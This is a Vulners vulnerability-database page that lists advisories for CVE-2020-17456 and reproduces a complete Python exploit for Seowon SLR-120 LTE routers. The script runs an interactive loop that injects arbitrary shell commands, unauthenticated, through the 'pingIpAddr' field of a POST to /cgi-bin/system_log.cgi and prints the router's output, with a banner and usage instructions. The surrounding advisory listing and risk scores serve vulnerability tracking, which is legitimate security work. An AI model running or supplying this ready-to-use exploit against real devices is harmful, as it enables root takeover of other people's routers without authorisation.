Vulners
Lucene search
Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) Exploit
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | Exploit for OS Command Injection in Seowonintech Slc-130_Firmware | 21 Jan 202106:16 | – | githubexploit |
 | Seowon SlC 130 Router - Remote Code Execution Exploit | 22 Aug 202000:00 | – | zdt |
 | CVE-2020-17456 | 20 Aug 202000:00 | – | attackerkb |
 | CVE-2020-17456 | 12 Mar 202217:21 | – | circl |
 | Seowon Intech Remote Code Execution (CVE-2020-17456) | 13 Sep 202000:00 | – | checkpoint_advisories |
 | CVE-2020-17456 | 19 Aug 202018:20 | – | cve |
 | CVE-2020-17456 | 19 Aug 202018:20 | – | cvelist |
 | Seowon SlC 130 Router - Remote Code Execution | 21 Aug 202000:00 | – | exploitdb |
| Seowon SLR-120 Router - Remote Code Execution (Unauthenticated) | 11 Mar 202200:00 | – | exploitdb |
 | SEOWON INTECH SLC-130 & SLR-120S - Unauthenticated Remote Code Execution | 8 Jun 202604:09 | – | nuclei |
10
# Exploit Title: Seowon SLR-120 Router - Remote Code Execution (Unauthenticated)
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=126&big_kind=B05&middle_kind=B05_30
# Version: All version
# Tested on: Windows 10 Enterprise x64 , Linux
# CVE : CVE-2020-17456
# [ About - Seowon SLR-120 router ]:
#The SLR-120 series are provide consistent access to LTE networks and transforms it to your own hotspot while being mobile,
#The convenience of sharing wireless internet access invigorates your lifestyle, families,
#friends and workmates. Carry it around to boost your active communication anywhere.
# [ Description ]:
#Execute commands without authentication as admin user ,
#To use it in all versions, we only enter the router ip & Port(if available) in the script and Execute commands with root user.
# [ Vulnerable products ]:
#SLR-120S42G
#SLR-120D42G
#SLR-120T42G
import requests
print ('''
###########################################################
# Seowon SLR-120S42G router - RCE (Unauthenticated) #
# BY:Aryan Chehreghani #
# Team:TAPESH DIGITAL SECURITY TEAM IRAN #
# mail:[email protected] #
# -+-USE:python script.py #
# Example Target : http://192.168.1.1:443/ #
###########################################################
''')
url = input ("=> Enter Target : ")
while(True):
try:
cmd = input ("~Enter Command $ ")
header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0",
"Accept": "*/*",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Content-Length": "207",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}
datas = {
'Command':'Diagnostic',
'traceMode':'ping',
'reportIpOnly':'',
'pingIpAddr':';'+cmd,
'pingPktSize':'56',
'pingTimeout':'30',
'pingCount':'4',
'maxTTLCnt':'30',
'queriesCnt':'3',
'reportIpOnlyCheckbox':'on',
'logarea':'com.cgi',
'btnApply':'Apply',
'T':'1646950471018'
}
x = requests.post(url+'/cgi-bin/system_log.cgi?',data=datas)
print(x.text)
except:
break
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Mar 2022 00:00Current
9.6High risk
Vulners AI Score9.6
CVSS 27.5
CVSS 3.19.8
EPSS0.88911